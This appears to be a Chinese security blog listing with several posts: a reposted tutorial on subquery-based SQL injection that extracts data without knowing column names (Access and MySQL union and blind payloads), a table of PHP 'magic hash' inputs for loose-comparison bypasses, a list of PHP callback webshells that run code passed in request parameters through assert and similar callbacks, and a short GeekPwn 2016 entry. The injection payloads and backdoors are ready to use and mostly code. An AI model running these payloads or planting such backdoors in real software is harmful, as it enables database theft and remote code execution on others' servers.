admin 发布的文章

基于子查询的SQL注入——免猜字段名

条件:已知表名,字段名未知,数据库本身支持子查询 对付access比较有用,也可以用来偷懒,比如从各种ctf的flag表里面读数据

思路:在子查询里面写针对目标表的联合查询:第一个查询以常量为每一个字段占位,同时指定别名;紧随其后的联合查询查询目标表所有字段(*);最后对这个子查询的结果集进行联合查询或盲注。

例如以下注入点:

select title,time,author,content from article where id={inject here}

字段为四,已知表名admin,admin字段未知 先猜测admin表字段总数,在子查询中加入order by,999999999 为不存在的id:

select title,time,author,content from article where id=999999999 union select 1,2,3,4 from(select * from admin order by 1)

假设获得字段总数为五,构造子查询的联合查询语句并指定别名:

select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin

最后对这个子查询结果集进行查询即可:

select title,time,author,content from article where id=999999999 union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5 from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin)

盲注的时候可以这样(用于回显不同时):

select title,time,author,content from article where id=999999999 or (select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0

也可以这样(用于因多次代入无论如何都报错时,或500/200的区别时):

select title,time,author,content from article where id=999999999 or iif((select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0,1,(select 2 from multi_rows_table))=1

需要multi_rows_table记录数大于1 最后,部分数据库需要对子查询指定别名(access不用指定所以没写)。 解释一下,上述的查询都是针对access的payload,mysql语法可以写成如下

select title,time,author,content from article where id=999999999 union select 1,2,3,concat(field_1,0x23,field_2,0x23,field_3,0x23,field_4,0x23,field_5) from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin) as sb;

转载来自http://www.hazzel.cn/archives/3.html


php magic hashs

I do think php is the best language...
md2 32 505144726 0e015339760548602306096794382326
md4 32 48291204 0e266546927425668450445617970135
md5 32 240610708 0e462097431906509019562988736854
sha1 40 10932435112 0e07766915004133176347055865026311692244
sha224 56 – – –
sha256 64 – – –
sha384 96 – – –
sha512 128 – – –
ripemd128 32 315655854 0e251331818775808475952406672980
ripemd160 40 20583002034 00e1839085851394356611454660337505469745
ripemd256 64 – – –
ripemd320 80 – – –
whirlpool 128 – – –
tiger128,3 32 265022640 0e908730200858058999593322639865
tiger160,3 40 13181623570 00e4706040169225543861400227305532507173
tiger192,3 48 – – –
tiger128,4 32 479763000 00e05651056780370631793326323796
tiger160,4 40 62241955574 0e69173478833895223726165786906905141502
tiger192,4 48 – – –
snefru 64 – – –
snefru256 64 – – –
gost 64 – – –
adler32 8 FR 00e00099
crc32 8 2332 0e684322
crc32b 8 6586 0e817678
fnv132 8 2186 0e591528
fnv164 16 8338000 0e73845709713699
joaat 8 8409 0e074025
haval128,3 32 809793630 00e38549671092424173928143648452
haval160,3 40 18159983163 0e01697014920826425936632356870426876167
haval192,3 48 48892056947 0e4868841162506296635201967091461310754872302741
haval224,3 56 – – –
haval256,3 64 – – –
haval128,4 32 71437579 0e316321729023182394301371028665
haval160,4 40 12368878794 0e34042599806027333661050958199580964722
haval192,4 48 – – –
haval224,4 56 – – –
haval256,4 64 – – –
haval128,5 32 115528287 0e495317064156922585933029613272
haval160,5 40 33902688231 00e2521569708250889666329543741175098562
haval192,5 48 52888640556 0e9108479697641294204710754930487725109982883677


php一些回调后门

header_register_callback(create_function('','return assert($_POST[\'k\']);'));

$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);`

数据库回调后门

$e = $_REQUEST['e'];
$db = new PDO('sqlite:sqlite.db3');
$db->sqliteCreateFunction('myfunc', $e, 1);
$sth = $db->prepare("SELECT myfunc(:exec)");
$sth->execute(array(':exec' => $_REQUEST['pass']));
$e = $_REQUEST['e'];

register_shutdown_function($e, $_REQUEST['pass']);

mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);

array_reduce(array($_POST['k']),create_function('$a,$b','return assert($b);'));

set_exception_handler(create_function('','return assert($_GET[k]);'));
throw new exception();

class a
{
  public function __construct($args)
  {
    forward_static_call('assert',$args);
  }
}
new a($_POST[k]);

iterator_apply(new arrayiterator(array($_GET['k'])),create_function('Iterator $i','assert($i->current());'),array(new arrayiterator(array($_GET['k']))));

array_intersect_ukey(array($_GET['k']=>'1'),array($_GET['k']=>'1'),'assert');

array_uintersect_uassoc(array($_GET[k]),array(''),'assert','strstr');

array_intersect_uassoc(array($_POST['k']=>''),array(''),'assert');

filter_var("phpinfo();" ,1024, array("options" => "assert"));


记GeekPwn2016一个坑题

GeekPwn我好水。。最终也木有进决赛。。不开森。

第一次做如此接近实战的CTF。。

详细WP请见附件(坑爹的TypeEcho不能直接从word粘贴。。)

emage.pdf